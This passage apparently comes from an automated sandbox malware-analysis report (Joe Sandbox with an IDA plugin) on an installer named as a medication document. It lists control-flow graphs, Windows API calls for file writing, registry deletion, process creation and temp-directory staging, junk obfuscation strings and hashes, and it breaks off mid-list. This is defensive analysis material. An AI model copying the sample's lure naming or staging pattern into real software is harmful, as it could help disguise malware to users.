                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                • String ID: Completed
                                                • API String ID: 2531174081-3087654605
                                                • Opcode ID: 48b19a34b63cb90607c45f1125da49094336e2c299eab4fbc02cedcd7faf0acf
                                                • Instruction ID: 4e820289f32981fa80bdc57a8535783694e00142cb9a6ac2a8905b2d060becfb
                                                • Opcode Fuzzy Hash: 48b19a34b63cb90607c45f1125da49094336e2c299eab4fbc02cedcd7faf0acf
                                                • Instruction Fuzzy Hash: 9D219D31D00518BACB21AF95DD84ADFBFB8EF44350F14807AF904B62A0C7794A41DFA8

                                                Control-flow Graph

                                                control_flow_graph 618 40317b-4031a4 GetTickCount 619 4032e5-4032ed call 402d18 618->619 620 4031aa-4031d5 call 40330d SetFilePointer 618->620 625 4032ef-4032f4 619->625 626 4031da-4031ec 620->626 627 4031f0-4031fe call 4032f7 626->627 628 4031ee 626->628 631 403204-403210 627->631 632 4032d7-4032da 627->632 628->627 633 403216-40321c 631->633 632->625 634 403247-403263 call 40638e 633->634 635 40321e-403224 633->635 640 4032e0 634->640 641 403265-40326d 634->641 635->634 637 403226-403246 call 402d18 635->637 637->634 645 4032e2-4032e3 640->645 643 4032a1-4032a7 641->643 644 40326f-403285 WriteFile 641->644 643->640 648 4032a9-4032ab 643->648 646 403287-40328b 644->646 647 4032dc-4032de 644->647 645->625 646->647 649 40328d-403299 646->649 647->645 648->640 650 4032ad-4032c0 648->650 649->633 651 40329f 649->651 650->626 652 4032c6-4032d5 SetFilePointer 650->652 651->650 652->619
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00403190
                                                  • Part of subcall function 0040330D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B
                                                • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000), ref: 004031C3
                                                • WriteFile.KERNELBASE(0040BE78,00411DF7,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?), ref: 0040327D
                                                • SetFilePointer.KERNELBASE(00130E8B,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C), ref: 004032CF
                                                Strings
                                                • habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 004031F0, 004031F6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: File$Pointer$CountTickWrite
                                                • String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek
                                                • API String ID: 2146148272-2559241417
                                                • Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                • Instruction ID: 37036d35f8974e55ed68100cf34a45723990335e8d7a2adc0945050858e8c70a
                                                • Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                • Instruction Fuzzy Hash: 7D41CB725042019FDB10DF29ED848A63BACFB54356720827FE910B22E1D7B99D41DBED

                                                Control-flow Graph

                                                control_flow_graph 653 4015b9-4015cd call 402b38 call 4059de 658 401614-401617 653->658 659 4015cf-4015eb call 405960 CreateDirectoryW 653->659 661 401646-402195 call 401423 658->661 662 401619-401638 call 401423 call 405ee8 SetCurrentDirectoryW 658->662 668 40160a-401612 659->668 669 4015ed-4015f8 GetLastError 659->669 675 4029c5-4029d4 661->675 662->675 676 40163e-401641 662->676 668->658 668->659 672 401607 669->672 673 4015fa-401605 GetFileAttributesW 669->673 672->668 673->668 673->672 676->675
                                                APIs
                                                  • Part of subcall function 004059DE: CharNextW.USER32(?,?,00424ED8,?,00405A52,00424ED8,00424ED8,?,?,75572EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\Apixaban - August 2024.exe"), ref: 004059EC
                                                  • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 004059F1
                                                  • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 00405A09
                                                • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Usurpatoren,?,00000000,000000F0), ref: 00401630
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Usurpatoren, xrefs: 00401623
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                • String ID: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Usurpatoren
                                                • API String ID: 3751793516-1051084359
                                                • Opcode ID: 77a50746faaf70f481261059f09a464f58bc4f4b68c75f239c42b854978f3346
                                                • Instruction ID: 199c01fa1d361ac50fd0ab4436582695df459e1bfde9dc24052da25e00d2fbae
                                                • Opcode Fuzzy Hash: 77a50746faaf70f481261059f09a464f58bc4f4b68c75f239c42b854978f3346
                                                • Instruction Fuzzy Hash: D011C271908104EBDB206FA0CD449AF36B0EF15365B64063BF881B62E1D63D49819A6E

                                                Control-flow Graph

                                                control_flow_graph 679 40638e-4063b1 680 4063b3-4063b6 679->680 681 4063bb-4063be 679->681 682 406ddb-406ddf 680->682 683 4063c1-4063ca 681->683 684 4063d0 683->684 685 406dd8 683->685 686 4063d7-4063db 684->686 687 406517-406bbe 684->687 688 40647c-406480 684->688 689 4064ec-4064f0 684->689 685->682 695 4063e1-4063ee 686->695 696 406dc3-406dd6 686->696 698 406bc0-406bd6 687->698 699 406bd8-406bee 687->699 693 406486-40649f 688->693 694 406d2c-406d36 688->694 690 4064f6-40650a 689->690 691 406d3b-406d45 689->691 697 40650d-406515 690->697 691->696 700 4064a2-4064a6 693->700 694->696 695->685 701 4063f4-40643a 695->701 696->682 697->687 697->689 704 406bf1-406bf8 698->704 699->704 700->688 705 4064a8-4064ae 700->705 702 406462-406464 701->702 703 40643c-406440 701->703 708 406472-40647a 702->708 709 406466-406470 702->709 706 406442-406445 GlobalFree 703->706 707 40644b-406459 GlobalAlloc 703->707 710 406bfa-406bfe 704->710 711 406c1f-406c2b 704->711 712 4064b0-4064b7 705->712 713 4064d8-4064ea 705->713 706->707 707->685 714 40645f 707->714 708->700 709->708 709->709 715 406c04-406c1c 710->715 716 406dad-406db7 710->716 711->683 718 4064c2-4064d2 GlobalAlloc 712->718 719 4064b9-4064bc GlobalFree 712->719 713->697 714->702 715->711 716->696 718->685 718->713 719->718
                                                Strings
                                                • habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 00406398
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek
                                                • API String ID: 0-2559241417
                                                • Opcode ID: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
                                                • Instruction ID: 37bedb047a1cdcb2186193905b10d92141f0d7a21aac59a3988bc0e8c58e701c
                                                • Opcode Fuzzy Hash: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
                                                • Instruction Fuzzy Hash: 8A816671E04228DBDF24CFA8C844BADBBB0FF44305F12816AD856BB281C7785A96DF44

                                                Control-flow Graph

                                                control_flow_graph 720 402b78-402ba1 RegOpenKeyExW 721 402ba3-402bae 720->721 722 402c0c-402c10 720->722 723 402bc9-402bd9 RegEnumKeyW 721->723 724 402bb0-402bb3 723->724 725 402bdb-402bed RegCloseKey call 406252 723->725 727 402c00-402c03 RegCloseKey 724->727 728 402bb5-402bc7 call 402b78 724->728 732 402c13-402c19 725->732 733 402bef-402bfe 725->733 730 402c09-402c0b 727->730 728->723 728->725 730->722 732->730 735 402c1b-402c29 RegDeleteKeyW 732->735 733->722 735->730 737 402c2b 735->737 737->722
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B99
                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD5
                                                • RegCloseKey.ADVAPI32(?), ref: 00402BDE
                                                • RegCloseKey.ADVAPI32(?), ref: 00402C03
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C21
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: Close$DeleteEnumOpen
                                                • String ID:
                                                • API String ID: 1912718029-0
                                                • Opcode ID: 5dde48613cb83d0adfaafee1501ae70c9f94bc296712e9edd69c2eafcb4792e1
                                                • Instruction ID: 9ec10266fc8442ca9feb2f2c36393197ef7fd7660a084b6a818e704b420db749
                                                • Opcode Fuzzy Hash: 5dde48613cb83d0adfaafee1501ae70c9f94bc296712e9edd69c2eafcb4792e1
                                                • Instruction Fuzzy Hash: 0D113A7190410CFEEF11AF90DE89EAE3B79EB44348F10057AFA05A10E0D3B59E51AA69

                                                Control-flow Graph

                                                control_flow_graph 738 403060-40306e 739 403070-403086 SetFilePointer 738->739 740 40308c-403095 call 40317b 738->740 739->740 743 403175-403178 740->743 744 40309b-4030ae call 405bd7 740->744 747 403161 744->747 748 4030b4-4030c8 call 40317b 744->748 750 403163-403164 747->750 748->743 752 4030ce-4030d1 748->752 750->743 753 4030d3-4030d6 752->753 754 40313d-403143 752->754 757 403172 753->757 758 4030dc 753->758 755 403145 754->755 756 403148-40315f ReadFile 754->756 755->756 756->747 759 403166-40316f 756->759 757->743 760 4030e1-4030eb 758->760 759->757 761 4030f2-403104 call 405bd7 760->761 762 4030ed 760->762 761->747 765 403106-40311b WriteFile 761->765 762->761 766 403139-40313b 765->766 767 40311d-403120 765->767 766->750 767->766 768 403122-403135 767->768 768->760 769 403137 768->769 769->757
                                                APIs
                                                • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000,00409230,?), ref: 00403086
                                                • WriteFile.KERNELBASE(00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,?,000000FF,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403113
                                                Strings
                                                • habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 004030DC, 004030F3, 0040310F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: File$PointerWrite
                                                • String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek
                                                • API String ID: 539440098-2559241417
                                                • Opcode ID: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                                                • Instruction ID: fc2ead670903f3fcf09a518996cfd184d9dc321171b4a7c5d6e0cc79c3f8c1f9
                                                • Opcode Fuzzy Hash: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                                                • Instruction Fuzzy Hash: 8C312631504219FBDF11CF65EC44A9E3FBCEB08755F20813AF904AA1A0D3749E51DBA9

                                                 Control-flow Graph (rendered as an image in the report; legend "Executed / Not Executed" omitted, node and edge data kept)
                                                 control_flow_graph 770 405b83-405b8f 771 405b90-405bc4 GetTickCount GetTempFileNameW 770->771 772 405bd3-405bd5 771->772 773 405bc6-405bc8 771->773 774 405bcd-405bd0 772->774 773->771 775 405bca 773->775 775->774
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00405BA1
                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403356,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405BBC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                • API String ID: 1716503409-1331003597
                                                • Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                • Instruction ID: b92cbf5d1f1efc9604712da85ceffb4fcd72973976825a501547a71b9f4f898e
                                                • Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                • Instruction Fuzzy Hash: 14F09676600204BFDB008F55DC05A9B77B8EB91710F10803AE900F7181E2B0BD40CB64
                                                APIs
                                                • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
                                                • lstrlenW.KERNEL32(0040A580,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
                                                • RegSetValueExW.KERNELBASE(?,?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
                                                • RegCloseKey.ADVAPI32(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: CloseCreateValuelstrlen
                                                • String ID:
                                                • API String ID: 1356686001-0
                                                • Opcode ID: 4180e4ab82bff7ff89890fe0cd785ffe3c04f71f059799902af0cb5b0267beb0
                                                • Instruction ID: 4c75d48ff27920bf3256dab6d3d18bc6d0e5d26c1911ded3a9e9fdbcc9a4e390
                                                • Opcode Fuzzy Hash: 4180e4ab82bff7ff89890fe0cd785ffe3c04f71f059799902af0cb5b0267beb0
                                                • Instruction Fuzzy Hash: 89118EB1A00108BEEB10AFA4DE4AEAF777CEB54358F10043AF504B61D0D7B86E419B69
                                                APIs
                                                  • Part of subcall function 00405192: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                  • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                  • Part of subcall function 00405192: lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
                                                  • Part of subcall function 00405192: SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                  • Part of subcall function 00405663: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
                                                  • Part of subcall function 00405663: CloseHandle.KERNEL32(?), ref: 00405695
                                                • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431940509.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Apixaban - August 2024.jbxd
                                                Similarity
                                                • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                • String ID:
                                                • API String ID: 3585118688-0
                                                • Opcode ID: b9acc33138c3e4e902b3b85438cd98049fdd0351d6a83afd457270008e50ac81
                                                • Instruction ID: 8e91623f4638d025a4933f87a40467008e120c5c7d6e9a438bfd220985abd326
                                                • Opcode Fuzzy Hash: b9acc33138c3e4e902b3b85438cd98049fdd0351d6a83afd457270008e50ac81
                                                • Instruction Fuzzy Hash: 5D11A131D00204EBCF109FA1CD859DE7AB5EB04315F60443BF905B62E0C7794A92DF9A
                                                APIs
                                                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
                                                • CloseHandle.KERNEL32(?), ref: 00405695
                                                Strings
                                                • Error launching installer, xrefs: 00405676
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1431660768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1431461612.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431718408.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1431759067.000000000040B000.00000004.00000001.01000000.00000003.sdmp
